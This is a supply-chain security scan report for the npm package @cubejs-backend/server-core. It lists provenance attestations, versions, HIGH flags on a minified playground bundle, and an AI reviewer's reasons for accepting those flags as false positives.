@cubejs-backend/server-core

Cube.js base component to wire all backend components together

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation npm registry signatures gitHead linked

Maintainers

cubedevincstatsbotkeydunovmaxim_cube

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source	Rule	Reason	Accepted by	When
source-diff	net-exec-file:playground/assets/index-Dp9g9mH4.js	AI (source-diff): Network calls and dynamic code in playground bundle are standard React SPA patterns (fetch for modulepreload), not dropper behavior.	ai	2026/05/30
source-diff	obfuscated-file:playground/assets/index-Dp9g9mH4.js	AI (source-diff): Bundled React/Vite SPA for Cube.js playground UI; minified output is expected and consistent across versions.	ai	2026/05/30
semgrep	semgrep:api-obfuscation-reflect	AI (semgrep): Fires in bundled playground CSS-in-JS asset; not malicious API obfuscation.	ai	2026/05/28
publish-pattern	dormant-publish	AI (publish-pattern): SLSA provenance attestation present; no material changes from prior version; established monorepo with 1160 published versions.	ai	2026/05/18
dependencies	unvetted-dep:@cubejs-backend/dotenv	AI (dependencies): Scoped @cubejs-backend dependency; part of the same Cube.js monorepo ecosystem, stable across versions.	ai	2026/05/18
phantom-deps	phantom-dep:moment	AI (phantom-deps): moment is a declared runtime dep; phantom-dep heuristic false positive for this package.	ai	2026/05/05
phantom-deps	phantom-dep:codesandbox-import-utils	AI (phantom-deps): codesandbox-import-utils is a declared runtime dep; phantom-dep heuristic false positive for this package.	ai	2026/05/05
phantom-deps	phantom-dep:semver	AI (phantom-deps): semver is a declared runtime dep; phantom-dep heuristic false positive for this package.	ai	2026/05/05
bogus-package	bogus-package	AI (bogus-package): Monorepo sub-package; README links to docs, no keywords is normal for internal packages.	ai	2026/05/05

Versions (showing 23 of 23)

Version	Deps	Published
1.6.55	31 / 13	2026-06-05
1.6.54	31 / 13	2026-06-04
1.6.53	31 / 13	2026-06-02
1.6.52	31 / 13	2026-05-29
1.6.51	31 / 13	2026-05-27
1.6.50	31 / 13	2026-05-22
1.6.49	31 / 13	2026-05-21
1.6.48	31 / 13	2026-05-19
1.6.47	31 / 13	2026-05-18
1.6.46	31 / 13	2026-05-11
1.6.45	31 / 13	2026-05-11
1.6.44	31 / 13	2026-05-06
1.6.43	31 / 13	2026-05-02
1.6.42	31 / 13	2026-05-01
1.6.41	31 / 13	2026-05-01
1.6.40	31 / 13	2026-04-30
1.6.39	31 / 13	2026-04-24
1.6.37	31 / 13	2026-04-20
1.6.36	31 / 13	2026-04-16
1.6.35	31 / 13	2026-04-15
1.6.34	31 / 13	2026-04-14
1.6.33	31 / 13	2026-04-09
1.6.32	31 / 13	2026-04-06

v1.6.55

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.54

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.53

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.52

3 findings

HIGH New obfuscated file: playground/assets/index-Dp9g9mH4.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: playground/assets/index-Dp9g9mH4.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.51

3 findings

HIGH New obfuscated file: playground/assets/index-Dp9g9mH4.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: playground/assets/index-Dp9g9mH4.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.50

3 findings

HIGH New obfuscated file: playground/assets/index-Dp9g9mH4.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: playground/assets/index-Dp9g9mH4.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.49

3 findings

HIGH New obfuscated file: playground/assets/index-Dp9g9mH4.js source-diff

Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.

HIGH New file with network + code execution: playground/assets/index-Dp9g9mH4.js source-diff

Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.48

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.47

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.46

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.45

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.44

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.43

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.42

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.41

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.40

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.39

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.37

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.36

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.35

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.34

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.33

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.

v1.6.32

1 finding

INFO Has SLSA provenance attestation provenance

Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.